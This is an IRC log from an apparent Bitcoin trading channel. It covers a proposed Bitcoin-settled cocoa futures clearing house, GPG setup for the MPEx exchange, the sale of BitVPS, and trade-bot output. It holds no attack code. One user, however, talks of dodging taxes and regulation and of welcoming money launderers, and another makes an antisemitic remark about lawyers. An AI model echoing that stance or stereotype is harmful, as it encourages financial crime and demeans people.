specs ? Dec 15 20:03:47 bean, less legality issues in most countries Dec 15 20:04:15 aha. Dec 15 20:04:49 i can get beans straight from the farms, as long as I have contracts to sell them against, ergo the clearing house Dec 15 20:04:58 cocoa beans taste... umm... interesting Dec 15 20:05:14 [MPEX] [S.MPOE] 8001 @ 0.000625 = 5.0006 BTC [-] Dec 15 20:05:15 yes you drink their nectar everyday Dec 15 20:05:15 [MPEX] [S.MPOE] 9650 @ 0.00062473 = 6.0286 BTC [-] Dec 15 20:05:16 [MPEX] [S.MPOE] 1499 @ 0.00062432 = 0.9359 BTC [-] Dec 15 20:05:24 unless you don't drink coffee Dec 15 20:05:26 do I ? Dec 15 20:05:42 I do not drink coffee every day Dec 15 20:05:58 i drink it all day every day Dec 15 20:06:06 why? Dec 15 20:06:27 thestringpuller well this is certainly interesting. what fee would you need for delivery and what min/max volumes ? Dec 15 20:07:05 for me, coffee is like a dessert Dec 15 20:07:50 ideally mircea_popescu my vision was that of buyer X has some Y number of contracts on cocoa, I would need to know his "end game" as where he wants the cocoa to end up, is it part of a portfolio or would he be "sub-distributing" to say coffee shops or a bean roaster Dec 15 20:09:01 if he just wants to pick up said asset, and store it in his house from port or whatever delivery terminal that can be arranged, but given we're dealing with the internet (this person could be any place on earth), then there has to be some kind of shipping network Dec 15 20:09:46 mainly all I need is a good delivery egineer, the fee would depend on volume Dec 15 20:10:11 well this normally works the following way : Dec 15 20:10:31 well ISYS/logistics engineer like those guys who yell at the warehouse packers to make sure UPS is "moving at the speed of business" Dec 15 20:10:35 1. upon settlement date all held contracts are to be delivered, mpex prepares list of fingerprints and amounts, signs the list and sends it to you. Dec 15 20:10:48 2. people on the list send you signed messages stating disposition of their cocoa Dec 15 20:10:57 3. you execute within a fixed timeframe, possibly for a fee. Dec 15 20:11:15 2 is the most important part Dec 15 20:11:25 yeah. Dec 15 20:11:42 well, if beneficiary fails to state you don't deliver. Dec 15 20:12:01 if XYZ live in Asia, Australia and Europe respectively Dec 15 20:12:21 this is good stuff: http://bitbrew.net/peruvian-pick-me-up/ Dec 15 20:12:25 There could be a logistics nightmere Dec 15 20:12:31 why ? Dec 15 20:13:06 if all contracts are coming from a geographic convergence point (close to the same area) rather than a divergent one, the cost is significantly lower Dec 15 20:13:27 especially with the general volume we are discussing Dec 15 20:13:40 we're not discussing any volume yet, haven't gotten to that Dec 15 20:13:46 for instance if this were barrels of oil and not crates of cocoa Dec 15 20:15:52 i have a question about 1: upon the settlement date, the clearing house would immediately purchase said physical assets immediately (whatever total volume dependent on the list from 1 and 2), from money on hand, however would mpex reimburse them (in btc that is) Dec 15 20:16:19 nono, you as the settler get the contracts. Dec 15 20:16:23 you sell them for as much as you want Dec 15 20:16:31 when the time comes, everything outstanding you deliver. Dec 15 20:17:34 i thought the settler and buyer were usually the same or am I confused? Dec 15 20:17:58 i think we take this to pm Dec 15 20:20:48 [MPEX] [S.DICE] 3000 @ 0.00336465 = 10.094 BTC [+] Dec 15 20:23:05 mircea_popescu: Hi , Is there any place that help me to understand how can I start working with mpex.co? Dec 15 20:23:23 rbenzaquen this place works. what's the problem ? Dec 15 20:24:18 mircea_popescu: Thanks, I have installed gpg in my linux box, do I need to generate a pub key? Dec 15 20:24:38 yes, you generate a public/private keypair. one second Dec 15 20:24:58 http://www.madboa.com/geek/gpg-quickstart/ see that. Dec 15 20:25:57 mircea_popescu: great, I'll do that now. something I don't understand, how you co-relate your gpg public key with BTC public key? Dec 15 20:26:15 what do you mean by "BTC public key" ? Dec 15 20:26:46 mircea_popescu: If I want to make an order, how do I pay it? Dec 15 20:27:07 there's a special DEPOSIT order which tells you a sum Dec 15 20:27:12 you send that sum to exchange address Dec 15 20:27:29 say you want to deposit 100 btc. it says "deposit 100.48973984 BTC" Dec 15 20:27:33 you do and that's it. Dec 15 20:28:09 ok, So , I'll start creating my gpg pub key. and start playing, thanks very much for your help!! Dec 15 20:28:20 I'll look fwd to learn and start operating. Dec 15 20:28:45 no problem Dec 15 20:53:45 [MPEX] [S.MPOE] 1751 @ 0.00062432 = 1.0932 BTC [-] Dec 15 20:53:46 [MPEX] [S.MPOE] 5512 @ 0.00062381 = 3.4384 BTC [-] Dec 15 20:53:48 [MPEX] [S.MPOE] 10537 @ 0.00062344 = 6.5692 BTC [-] Dec 15 21:21:40 [MPEX] [S.MPOE] 6863 @ 0.00062344 = 4.2787 BTC [-] Dec 15 21:21:41 [MPEX] [S.MPOE] 12837 @ 0.00062254 = 7.9915 BTC [-] Dec 15 21:25:28 mircea_popescu: can I ask you one more question? Dec 15 21:26:46 surely. Dec 15 21:27:26 ./mpex.py STAT Dec 15 21:27:26 Enter your GPG passphrase: Dec 15 21:27:26 !!!WARNING!!! Dec 15 21:27:28 Invalid Signature, do not trust this data. Dec 15 21:27:30 Couldn't decode the reply from MPEx, perhaps you didn't sign the key? try running Dec 15 21:27:32 gpg --sign-key F1B69921 Dec 15 21:27:43 aha Dec 15 21:28:16 I already signed the key. Dec 15 21:28:38 I did not send 30BTC, I don't know to where. Dec 15 21:28:46 [MPEX] [S.MPOE] 7596 @ 0.00062254 = 4.7288 BTC [-] Dec 15 21:29:05 so, who is going to do the PT for ART? :) Dec 15 21:29:22 rbenzaquen well if you signed the key it should be ok. Dec 15 21:29:36 and you go DEPOSIT|50 for instance Dec 15 21:29:41 and it tells you where to send and how much. Dec 15 21:32:16 rbenzaquen: there are "brokers" who can execute your trades for you, so you do not have to cough up the excessive account sign up fees :) Dec 15 21:33:06 I don't care about the fees. Dec 15 21:33:52 [MPEX] [S.MPOE] 3200 @ 0.00063069 = 2.0182 BTC [+] Dec 15 21:34:31 mircea_popescu: fancy. I say the change. Dec 15 21:35:11 hehe cool Dec 15 21:36:24 [MPEX] [S.DICE] 750 @ 0.00336465 = 2.5235 BTC [+] Dec 15 21:36:25 [MPEX] [S.DICE] 1450 @ 0.0034 = 4.93 BTC [+] Dec 15 21:38:32 saw* Dec 15 21:57:08 ;;ticker Dec 15 21:57:08 BTCUSD ticker | Best bid: 13.55000, Best ask: 13.59990, Bid-ask spread: 0.04990, Last trade: 13.55001, 24 hour volume: 22995.40107950, 24 hour low: 13.05001, 24 hour high: 13.62989, 24 hour vwap: 13.48703 Dec 15 21:58:37 thestringpuller: do I know any basic linear algerbra? I should think so Dec 15 22:00:04 [MPEX] [S.MPOE] 12600 @ 0.00062343 = 7.8552 BTC [-] Dec 15 22:00:25 so a clearing house... it basically holds stuff and keeps a record of who owns it and makes it easy to transfer ownership of the things? Dec 15 22:12:25 [MPEX] [S.MPOE] 13925 @ 0.00062343 = 8.6813 BTC [-] Dec 15 22:12:26 [MPEX] [S.MPOE] 6896 @ 0.00062254 = 4.293 BTC [-] Dec 15 22:12:28 [MPEX] [S.MPOE] 2750 @ 0.00062182 = 1.71 BTC [-] Dec 15 22:12:29 [MPEX] [S.MPOE] 5279 @ 0.00061952 = 3.2704 BTC [-] Dec 15 22:12:29 [MPEX] [S.MPOE] 50 @ 0.00061934 = 0.031 BTC [-] Dec 15 22:13:57 [MPEX] [S.MPOE] 6450 @ 0.00061934 = 3.9947 BTC [-] Dec 15 22:13:59 [MPEX] [S.MPOE] 5450 @ 0.00061907 = 3.3739 BTC [-] Dec 15 22:18:02 so the icbit situation speaks directly to the need for a btc clearinghouse Dec 15 22:19:08 this summs it up: https://bitcointalk.org/index.php?topic=50817.msg1402129#msg1402129 Dec 15 22:20:40 lol Dec 15 22:20:53 "o no, we are not bucket shop mpoe-pr speaks lies!1!11!" Dec 15 22:20:57 two weeks later... Dec 15 22:21:37 < smickles> so a clearing house... it basically holds stuff and keeps a record of who owns it and makes it easy to transfer ownership of the things? <<< i'll add requiring collateral to this Dec 15 22:22:07 they should close the shop Dec 15 22:22:17 they should pay out THEN close the shop. Dec 15 22:22:25 yeah ofc. Dec 15 22:22:45 "mysterious manipulator" my foot. Dec 15 22:23:50 it's certainly plauseable that they were trying to pop the longs Dec 15 22:24:44 Nov 17 19:58:23 <_Fireball> so, would you be a man and write an apology? Dec 15 22:24:53 one of the reasons i love irc is the logs. Dec 15 22:25:08 Nov 17 19:57:25 <_Fireball> honestly, by reading your blog post, I see that you have little idea how futures exchanges work Dec 15 22:25:09 etc. Dec 15 22:27:40 [MPEX] [S.MPOE] 3800 @ 0.00061907 = 2.3525 BTC [-] Dec 15 22:32:01 perhaps this wors out cheaper than your gals mircea_popescu https://bitcointalk.org/index.php?topic=130989.0 Dec 15 22:32:13 you could see lots of youtube Dec 15 22:32:17 er read. Dec 15 22:32:19 lol Dec 15 22:32:34 TRANSCRIBE ALL THE YOUTUBES!!1 Dec 15 22:32:39 ya Dec 15 22:32:51 everything that is posted here at least Dec 15 22:33:17 actually... Dec 15 22:36:52 wait. waitwait. Dec 15 22:37:04 clipse guy's name was actually ROELOFSE ?! Dec 15 22:37:30 whats that a crashed ROFLCOPTER? Dec 15 22:38:25 lmaoplane Dec 15 22:39:27 https://bitcointalk.org/index.php?topic=125376.msg1402168#msg1402168 mircea_popescu << Dec 15 22:40:17 lol Dec 15 22:41:20 [MPEX] [S.MPOE] 15100 @ 0.00061907 = 9.348 BTC [-] Dec 15 22:41:22 [MPEX] [S.MPOE] 10600 @ 0.00061876 = 6.5589 BTC [-] Dec 15 22:44:56 [MPEX] [S.MPOE] 700 @ 0.00061876 = 0.4331 BTC [-] Dec 15 22:44:57 [MPEX] [S.MPOE] 10600 @ 0.00061823 = 6.5532 BTC [-] Dec 15 22:47:35 sooo, rg just announced in a private channel that bvps is undergoing a merger/sale/something. Dec 15 22:47:45 announcements imminent he says. Dec 15 22:48:32 me, arij and phungus will probably take over BitVPS. He just disclosed the 3 of us in OTC. Dec 15 22:49:03 aha cool. Dec 15 22:49:08 How the remaining shares will be shared and how BitVPS will be managed is not known for now. Dec 15 22:49:09 thats a twist. Dec 15 22:49:27 We're sorting this out. Dec 15 22:51:10 Namjies so you plan on delisting it ? or do a sort of m/a thing ? Dec 15 22:51:37 It would remain as is for MPEx. Dec 15 22:51:52 one of my sale stipulations Dec 15 22:51:54 Profits split on 1 million shares. Dec 15 22:51:57 is that everything stays the way it was Dec 15 22:52:14 just better Dec 15 22:52:15 :P Dec 15 22:52:21 aha. and you continue ops at current facilities ? Dec 15 22:52:40 well Dec 15 22:52:42 i wont be doing shit Dec 15 22:52:46 not you, them lol Dec 15 22:52:50 except for the fact that i work for one of the companies that hosts a bitvps server Dec 15 22:53:01 i will be in the shadows Dec 15 22:53:03 offering them hardware for cheap Dec 15 22:53:12 be in the shadows, fucking their routing :D Dec 15 22:53:18 hehe Dec 15 22:53:19 well Dec 15 22:53:22 its quite funny how i got this job Dec 15 22:53:30 i used to get into it wit hthier support all the time Dec 15 22:53:33 for being morons Dec 15 22:53:35 one day, boss contacts me Dec 15 22:53:42 'hey. you're smart. will you work for us?' Dec 15 22:53:50 "all my morons quit on me. wanna become one ? " Dec 15 22:53:52 rg: 'sure' Dec 15 22:54:02 mircea: i started as a level 1 tech Dec 15 22:54:06 ew Dec 15 22:54:15 i am now support manager and a lead on the operations team Dec 15 22:54:20 hey. Dec 15 22:54:26 After how much time? Dec 15 22:54:27 i accomplished this in less than 2 months. Dec 15 22:54:36 =P Dec 15 22:54:44 and i love my new company Dec 15 22:54:45 in 2 months fire the boss Dec 15 22:54:48 step 1. become support manager + lead ops. step 2. ???. step 3. linode hacked. Dec 15 22:54:48 and they love/need me Dec 15 22:55:06 Oh, that's what happened... Dec 15 22:55:28 haha Dec 15 22:59:54 what? BitVPS is going under? Dec 15 23:00:46 ha ha Dec 15 23:00:51 fucking rg scammed everyone Dec 15 23:01:50 no one got scammed. cool your jets. Dec 15 23:03:16 too late Dec 15 23:03:18 rg scammed Dec 15 23:03:31 cant put that geanie back in the bottle Dec 15 23:03:48 lol Dec 15 23:03:51 ?!? Dec 15 23:03:57 shutup diablo Dec 15 23:04:04 youre just mad cause i replaced your boyfriend at rapidxen Dec 15 23:04:46 YES RG, I AM TOTALLY HAVING LOTS OF SEX WITH NENOLOD _ALL THE TIME_ Dec 15 23:05:03 SERIOUSLY, WE'RE HALF WAY THROUGH THAT 55 GALLON DRUM OF LUBE WE GOT OFF AMAZON Dec 15 23:05:43 [MPEX] [S.MPOE] 1232 @ 0.00063069 = 0.777 BTC [+] Dec 15 23:06:40 ha ha jokes on you, steve would have to pay millions if you did that Dec 15 23:06:55 and by millions, I mean he'd just beat you with a pipe until you stop moving Dec 15 23:06:55 yeh steve is crazy about legal stuff Dec 15 23:06:57 i dont blame him Dec 15 23:07:09 if anyone mentions legalities in a ticket Dec 15 23:07:14 i have to immediately hand it over to him Dec 15 23:07:14 well, I think nenolod scared him Dec 15 23:07:33 one guy threatend to sue us cause i didnt answer his ticket within an hour Dec 15 23:07:39 i basically told him to go fuck himself Dec 15 23:07:45 only to find out later that it was a HUGE mistake Dec 15 23:07:49 and i shouldve jst handed over the ticket Dec 15 23:07:55 yeah dude, when someone says sue you have to say go fuck yourself on legal letterhead Dec 15 23:07:56 even if theres no real case,i still have to hand it over Dec 15 23:08:01 basically Dec 15 23:08:04 youre 100% right Dec 15 23:08:10 preferably, one of those law firms that have like four names Dec 15 23:08:22 i wouldnt wanna fuck with enzu's lawyers Dec 15 23:08:25 (the more names on the firm, the more they bill you for. true story.) Dec 15 23:08:26 theyre jews Dec 15 23:08:41 and i can tell you their retainer fee is ridic Dec 15 23:08:48 rg: well yeah Dec 15 23:08:53 its a standard corp lawyer firm Dec 15 23:09:13 if steve told me he writes a million dollar check to them every year I wouldnt even bat an eye Dec 15 23:10:36 so, if you guys are done circle jerking over a 4 name law firm, tell wtf is going on with BitVPS? Dec 15 23:10:48 oh, rg is just scamming his shareholders Dec 15 23:11:17 OK, nothing new here... I guess Dec 15 23:11:23 see, it works like this Dec 15 23:11:58 fuck, the sale of those damn PT's took too fkn long (getting the list etc). Dec 15 23:11:59 < does company have shares? > -> yes -> < does company accept bitcoin? > -> yes -> ( SCAM! ) Dec 15 23:13:20 [MPEX] [S.MPOE] 11018 @ 0.00063069 = 6.9489 BTC [+] Dec 15 23:13:22 [MPEX] [S.MPOE] 2682 @ 0.00063596 = 1.7056 BTC [+] Dec 15 23:13:57 I asked about few weeks ago, is BitVPS going under and some cunt here was assuring me, that everything is fine blaa blaa blaa Dec 15 23:14:22 EskimoBob: well Dec 15 23:14:24 its not going under Dec 15 23:14:28 hence the new owners Dec 15 23:14:40 if i continued to half ass it, yes, it would go under Dec 15 23:14:44 but im stopping that before it happens Dec 15 23:14:45 will they honour the old shares/contracts? Dec 15 23:14:46 oh fuck Dec 15 23:14:47 NEW MANAGEMENT Dec 15 23:14:50 EskimoBob: yes Dec 15 23:14:54 thats one of my contract stipulations Dec 15 23:14:55 RUN FOR THE HIIIIIiiiiIIiiIIIiiIIiiIILLLLS Dec 15 23:15:01 RUN FOR YOUR LIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIFE Dec 15 23:15:08 Diablo-D3: cool it for second Dec 15 23:15:11 The following stipulations will be imposed on this deal: Dec 15 23:15:11 1. Customers will not be moved Dec 15 23:15:11 2. Nothing will change for customers except better service. Dec 15 23:15:11 3. arij/someone buys the automated VPS software (something like $50/mo) Dec 15 23:15:14 grownups are talking Dec 15 23:15:17 my singing isnt that bad :< Dec 15 23:16:16 if I can selle my few PT shares back, I am happy. After that, you guys can do what ever you want :) Dec 15 23:16:29 you can do whatever you want Dec 15 23:16:36 the only thing thats changing is now bitvps will have a proper staff Dec 15 23:16:49 rg: whos the new management? Dec 15 23:17:01 sounds like good news... so lets see Dec 15 23:17:15 Diablo-D3: i have selected Namjies (BTC-Mining), arij and phungus Dec 15 23:17:17 brb Dec 15 23:17:24 rg: ahh Dec 15 23:17:24 phungus has 18 years of linux admin under his belt Dec 15 23:17:26 that might not be so bad Dec 15 23:17:30 and BTC-Mining is well.. the man Dec 15 23:17:40 and arij is a good guy Dec 15 23:17:42 trust worthy Dec 15 23:17:48 i really dont think it will be bad Dec 15 23:17:50 namjies is trustworthy Dec 15 23:17:55 theyre all trustworthy Dec 15 23:18:01 i wouldnt let them in if they werent Dec 15 23:18:01 but if he doesnt pay on those btc-mining shares, Im going to beat his ass like a drum Dec 15 23:18:04 the best part about it is Dec 15 23:18:08 this is my A list Dec 15 23:18:12 this is who i wanted to do bitvps Dec 15 23:18:20 if thats your A list, eh Dec 15 23:18:24 you need a better A list Dec 15 23:18:28 thats more like a B list Dec 15 23:18:36 cause an 18 year experienced linux admin is bad... Dec 15 23:18:38 puh leaze Dec 15 23:18:46 BTC-Mining is smart with numbers and a good programmer Dec 15 23:18:52 I've used linux wince 2001 so I know my stuff Dec 15 23:18:57 well, he'd have to have been using linux 6 years longer than me Dec 15 23:19:01 which might be impossible Dec 15 23:19:16 how dod I shot web Dec 15 23:19:32 he'd have to have been using linux when it was 3 years old Dec 15 23:20:28 [MPEX] [S.MPOE] 5206 @ 0.00063596 = 3.3108 BTC [+] Dec 15 23:20:29 [MPEX] [S.MPOE] 4321 @ 0.00063773 = 2.7556 BTC [+] Dec 15 23:20:31 [MPEX] [S.MPOE] 475 @ 0.00063789 = 0.303 BTC [+] Dec 15 23:20:32 [MPEX] [S.MPOE] 20300 @ 0.00063797 = 12.9508 BTC [+] Dec 15 23:20:33 [MPEX] [S.MPOE] 2898 @ 0.00063831 = 1.8498 BTC [+] Dec 15 23:21:03 hell, I think thats even pre 2.0 Dec 15 23:21:29 post debian though Dec 15 23:23:46 lol, mircea_popescu. fireball just called out your order : https://bitcointalk.org/index.php?topic=50817.msg1402245#msg1402245 Dec 15 23:25:13 I moved permanently to Linux on 2002 Dec 15 23:25:33 oh, 1 order of magnitude off, i guess Dec 15 23:26:29 EskimoBob knows his stuff Dec 15 23:26:31 the first linux i used... Dec 15 23:26:36 was RedHat 4.2 Dec 15 23:26:39 with 2.0.x Dec 15 23:26:44 vanderbilt Dec 15 23:26:45 ehe Dec 15 23:26:52 rg knows his stuff Dec 15 23:27:09 redhat 4.2 was the last good redhat release Dec 15 23:31:23 RH was my first too. :) Dec 15 23:31:31 I moved to linux shortly before potato became stable so.... Dec 15 23:31:53 that was 2000 Dec 15 23:31:58 and by move to, I mean fulltime Dec 15 23:32:08 I dual booted for 2-3 years before that Dec 15 23:33:22 yeah, potato. is still call debian "potato" Dec 15 23:33:41 ? Dec 15 23:33:49 I know stable is glacial, but jeez Dec 15 23:34:48 buzz, rex, bo, hamm, slink, woody, sarge, etch, lenny, and squeeze Dec 15 23:35:04 with wheezy testing, and jessie is the next testing after that Dec 15 23:35:14 pretty sure I havent left anyone out Dec 15 23:38:10 ehe Dec 15 23:38:13 not only was RH my first linux Dec 15 23:38:17 i got it in a magazine Dec 15 23:38:30 remember when magazines/books used to come with CDs Dec 15 23:38:32 good times Dec 15 23:44:36 and papers had adds: super fast new CPU 333Mh ! Dec 15 23:46:55 I'm not that knowledgeable. I'm not a programmer either. Dec 15 23:48:29 cant put that geanie back in the bottle <<< diablo scammed spelling. Dec 15 23:48:46 my first linux was given to my by a friend in the halls of highschool on a floppy Dec 15 23:50:01 iirc, it was DSL Dec 15 23:54:02 [MPEX] [S.MPOE] 6672 @ 0.00062774 = 4.1883 BTC [-] Dec 15 23:56:26 [MPEX] [S.MPOE] 4276 @ 0.00062507 = 2.6728 BTC [-] Dec 15 23:56:26 smickles: Dec 15 23:56:30 do you have a moment to talk Dec 15 23:56:40 mircea_popescu and I had a good talk :) Dec 15 23:56:56 sure Dec 15 23:57:33 we came up with a question for you though mircea_popescu Dec 15 23:58:37 if we are to completely avoid regulation, i.e. paying 0 taxes to the man to support the welfare kids, wouldn't we have to ship from say a private island? or like the middle of the ocean? Dec 16 00:03:37 i have no idea. Dec 16 00:05:40 no ideas at all? like fo realz, how would go cryptoanarchy on it? Dec 16 00:06:03 [MPEX] [S.MPOE] 15378 @ 0.00062613 = 9.6286 BTC [+] Dec 16 00:06:04 we should just overthrow the government in a small country and ship from there Dec 16 00:06:05 [MPEX] [S.MPOE] 3222 @ 0.00063375 = 2.0419 BTC [+] Dec 16 00:06:17 why exactly wouldn't you pay taxes ? Dec 16 00:06:31 because it supports people on welfare... Dec 16 00:06:32 seems cheaper than overthrowing a government Dec 16 00:06:42 and defeats the purpose of decentralization Dec 16 00:06:53 i'm just being overly libertarian today... :P Dec 16 00:06:56 lol k Dec 16 00:07:07 i'm workin' hard to move this cocoa Dec 16 00:07:22 why should the hipster barista's see a dime of it? Dec 16 00:08:05 lol. they smell it anyway Dec 16 00:08:05 because they fail at life, thinking that going to art school for $20,000 a semester would train them to write the shitty movie that they're parents are paying for Dec 16 00:08:31 thestringpuller: I can't currently try to pull off illegal things Dec 16 00:08:39 XD Dec 16 00:08:44 okay so how do we do it legally Dec 16 00:08:53 how many tariffs we gonna have to pay Dec 16 00:09:01 and I mean, specifically, things which are illigal where I am or where my immediate family is Dec 16 00:09:26 btc based physical future delivery isn't illegal in the US is it? Dec 16 00:09:35 thestringpuller: i'm unsure, but I think we'd only pay tarrifs if we imported things Dec 16 00:09:55 my idea is to price everything based on farm distribution Dec 16 00:10:10 we'd buy directly from willing cocoa farmers and that would set the baseline price for the market Dec 16 00:10:10 that'd prolly work. Dec 16 00:10:46 from there it's underwriting the future contracts in a fashion similar to the mpoe bot Dec 16 00:11:04 i only keep bringing the bot up because he tends not to lose money in the longterm Dec 16 00:11:51 the mpoe bot is b-s tho. i don't imagine you need something like that if you have price and forecast inputs from the farmers. Dec 16 00:12:02 thestringpuller: you wan't to do actual publicly traded futures in 'merica? Dec 16 00:12:24 it's be btc based though so it wouldn't be limited to america Dec 16 00:12:29 the clearing house would just be in murica Dec 16 00:12:58 I'm sure there are a ton of regulations to comply with then Dec 16 00:13:15 do you have a lot of capital to launch it? Dec 16 00:13:24 capital isn't an issue Dec 16 00:13:31 well it won't be an issue Dec 16 00:13:36 it's the regulation that's the issue Dec 16 00:13:47 thestringpuller i fail to see the sense, if the cocoa isn't produced in the states why centralize it there ? Dec 16 00:13:47 the whole point of btc is to be self regulating... Dec 16 00:14:00 i just happen to live here Dec 16 00:14:16 kinda dubious criteria Dec 16 00:14:18 get an employee in columbia or wherever Dec 16 00:14:19 i mean I can send people to columbia or wherever the fuck the farm is and they can set up a trailer office there Dec 16 00:14:23 but the LLC will likely be american Dec 16 00:14:26 why ? Dec 16 00:14:35 cause I live here? Dec 16 00:14:38 so ? Dec 16 00:14:55 i mean if you can make it so I have control and it's in another country (some vehicle to do that) I'd rather go that option Dec 16 00:14:59 like romania :) Dec 16 00:15:16 you can make a corp in any country wth. Dec 16 00:15:23 hire a local lawyer you'reset. Dec 16 00:15:50 is it really that easy? Dec 16 00:16:09 [MPEX] [S.MPOE] 4321 @ 0.00062518 = 2.7014 BTC [-] Dec 16 00:16:11 [MPEX] [S.MPOE] 10689 @ 0.00062507 = 6.6814 BTC [-] Dec 16 00:16:33 logically, a lawschool student incapable of drafting incorporation papers isn't able to graduate. Dec 16 00:16:35 in any country. Dec 16 00:17:04 like a doctor that can't feel tits. Dec 16 00:17:22 i think they call that molestation Dec 16 00:18:48 smickles: what is your take on this physical delivery of futures Dec 16 00:23:16 thestringpuller: I'm not familiar enough on practicing the business in 'merica to render much of an opinion. but Ideally, it sounds easy. make contract, honor the contract Dec 16 00:24:40 [MPEX] [S.MPOE] 17185 @ 0.00062507 = 10.7418 BTC [-] Dec 16 00:24:41 [MPEX] [S.MPOE] 7791 @ 0.00062292 = 4.8532 BTC [-] Dec 16 00:24:49 smickles what about the underwriting model? the mpoe bot seems to make most of it's money because it prices the contracts effectively Dec 16 00:25:16 but fairly enough that it's worth purchasing at times Dec 16 00:27:29 there are models for futures too, actually, it's possible to even use b-s, as options and futures can be converted to one another Dec 16 00:27:42 sure, just not ususally done Dec 16 00:28:15 would you be willing to help me with the model? Dec 16 00:29:38 if I can prove that the capital is a done deal Dec 16 00:30:06 there are 2-3 people in the coffee world who would be interested in funding this endeavor Dec 16 00:30:28 thestringpuller basically, you know what delivery costs, you know what you can buy cocoa for, so offer that Dec 16 00:30:32 and offer to buy at a spread under Dec 16 00:30:35 no magic involved Dec 16 00:31:25 If you really need help with a pricing model, I can probably help you punch the numbers into one of the standard formulas Dec 16 00:31:59 well less help with the model and more with the accounting, I would like to retain your btc accounting services Dec 16 00:32:14 mainly because I feel this will get regulated Dec 16 00:32:22 and then that opens mpex up to regulation... Dec 16 00:32:50 ah, you want me to do bookkeeping and reports for you? Dec 16 00:33:11 yes and general advice like when the feds come Dec 16 00:33:22 i meant, when the spanish inquisition comes Dec 16 00:33:42 http://mpex.co/faq.html#34 Dec 16 00:34:41 no one expects the spanish inquisition Dec 16 00:34:50 frankly, I think they're hiding in the fridge Dec 16 00:35:03 open it to get a soda BAM, forum threads spill out with scam accusations Dec 16 00:35:15 i thought you were a scammer Dec 16 00:35:28 nope Dec 16 00:35:37 just someone who got scammed by nefario Dec 16 00:35:40 i was just trollin' Dec 16 00:35:58 [MPEX] [S.MPOE] 3641 @ 0.00062292 = 2.2681 BTC [-] Dec 16 00:36:44 thestringpuller: you must know i'm not an expert in commodities trade regulation Dec 16 00:37:55 cocoa is currently at 3 units Dec 16 00:38:08 oops 4 Dec 16 00:38:10 for the month Dec 16 00:38:43 if you have not noticed, there is a new virtual security in litecoinglobal https://www.litecoinglobal.com/security/ART Dec 16 00:39:14 thestringpuller: cocoa is sold all over the wold. Why not talk to some of the guys? Dec 16 00:39:15 ... Dec 16 00:39:32 maybe you can use existing delivery networks to get your goods moving Dec 16 00:39:34 the idea is to sell cocoa through mpex Dec 16 00:39:49 and deregulated from the current market it's pegged at Dec 16 00:40:03 hmm.. contraband? Dec 16 00:40:27 no just shipped using a different currency? Dec 16 00:40:36 it'd be like someone using gold bars to buy oil or something Dec 16 00:40:50 you do not ship currency, you ship goods Dec 16 00:41:06 thestringpuller: from what i'm reading, it is generally illegal for 'mericans to offer futures to other 'mericans, unless it is done on a US regulated exchange Dec 16 00:41:06 you get paid in BTC and this is your business Dec 16 00:41:15 ... Dec 16 00:41:28 no one currently sells mass amounts of cocoa for btc Dec 16 00:41:45 there'd be multiple trade steps Dec 16 00:42:11 thestringpuller: I am not sure why is this even important. BTC is just a way to transfer fiat Dec 16 00:42:31 also with physical delivery of a futures contract I imagine with something like cocoa it'd be a way to move cocoa from a place of high supply to low demand Dec 16 00:42:53 by from market X that is in indonesia during a good season sell beans to coffee shops in new york Dec 16 00:43:02 [MPEX] [S.MPOE] 4321 @ 0.00062318 = 2.6928 BTC [+] Dec 16 00:43:04 [MPEX] [S.MPOE] 4068 @ 0.00062292 = 2.534 BTC [-] Dec 16 00:43:05 [MPEX] [S.MPOE] 2908 @ 0.00061823 = 1.7978 BTC [-] Dec 16 00:43:06 [MPEX] [S.MPOE] 10679 @ 0.000618 = 6.5996 BTC [-] Dec 16 00:43:07 [MPEX] [S.MPOE] 13474 @ 0.00061761 = 8.3217 BTC [-] Dec 16 00:44:21 do you see that BTC has actually nothing to do with that :) You need to move goods - few metric tons of beans ? Dec 16 00:44:27 well, futures are not commonly used for procurement irl, but that may be different for btc i guess Dec 16 00:44:28 thestringpuller: it seems that my company might have to register with the NFA Dec 16 00:44:46 the national football association !? Dec 16 00:44:53 indeed Dec 16 00:44:56 you need to use established shipping routes, wholesellers etc Dec 16 00:44:56 wtf ?! Dec 16 00:45:03 lol procurment Dec 16 00:45:26 yes ? Dec 16 00:46:08 [MPEX] [S.MPOE] 4321 @ 0.00061771 = 2.6691 BTC [+] Dec 16 00:46:10 [MPEX] [S.MPOE] 1521 @ 0.00061761 = 0.9394 BTC [-] Dec 16 00:46:11 [MPEX] [S.MPOE] 7958 @ 0.00061732 = 4.9126 BTC [-] Dec 16 00:46:11 ah, thestringpuller foreign business that do futures business with us customers need to get an exemption from the cftc Dec 16 00:46:38 for start. Go sell a bag of beans you get wfom local whole seller and see what happens. Then try to buy a bag from X and send get it to your destination Y and see, what happens. Dec 16 00:46:44 smickles at the leves involved i would imagine this would simply count as contract sourcing. Dec 16 00:46:47 so if you want to do this, you either need to 'know your customer' or not live in 'merica Dec 16 00:47:13 people run companies from prison Dec 16 00:47:17 american prisons Dec 16 00:47:19 called club fed Dec 16 00:47:26 there's gotta be away to live here and operate it Dec 16 00:47:32 you can live where ever you want but you need to have a actual company in those countries :) Dec 16 00:47:37 even if the physical side oftheoperation is being run by romanian orphans Dec 16 00:48:41 and that's why I am telling to use distributors that are set in those countries. Not sure, what the value is you actually add to the deal but this is up to you to figure out ;) Dec 16 00:48:45 smickles: i refuse to be regulated, if money launderers want to by lots of coffee let them Dec 16 00:49:03 heh, thestringpuller i don't see anything about the accountant needing to be registered with the nfa Dec 16 00:49:04 do they? Dec 16 00:50:01 lets do it! Dec 16 00:50:05 this is gonna be so much fun Dec 16 00:50:39 get yourself a 65 Kg bag and see, what you can do with it :) Dec 16 00:51:41 and I recommend looking around a bit. who is your competition for start Dec 16 00:51:47 dude that's not the point eskimo Dec 16 00:52:25 what is the point? Dec 16 00:53:47 [MPEX] [S.MPOE] 5272 @ 0.00061732 = 3.2545 BTC [-] Dec 16 00:55:55 ask yourself: what is the value I am offering to my clients? Dec 16 00:56:46 figure out your businessmodel and for start, test it on paper Dec 16 00:58:31 ... Dec 16 00:59:38 thestringpuller: I don't think I could take you on as a client if I suspected your business operated in violation of the gov't's rules Dec 16 01:00:30 thestringpuller: essentially, if you set up a foreign company to do this, and get a lawer to look it over and say it's ok, then I could Dec 16 01:00:57 “The thing that needs to be emphasized is that futures contracts are risk management tools,” Harangody says. “They are not intended to be procurement contracts” due to the expense and difficulty of meeting the exchange’s requirements. It’s easier to exit your responsibilities in the futures contract and go into the spot market and buy or sell those commodities, he adds. Dec 16 01:01:05 but, as I am trying to become a CPA in the future, there are ethical guidelines I need to adhere too 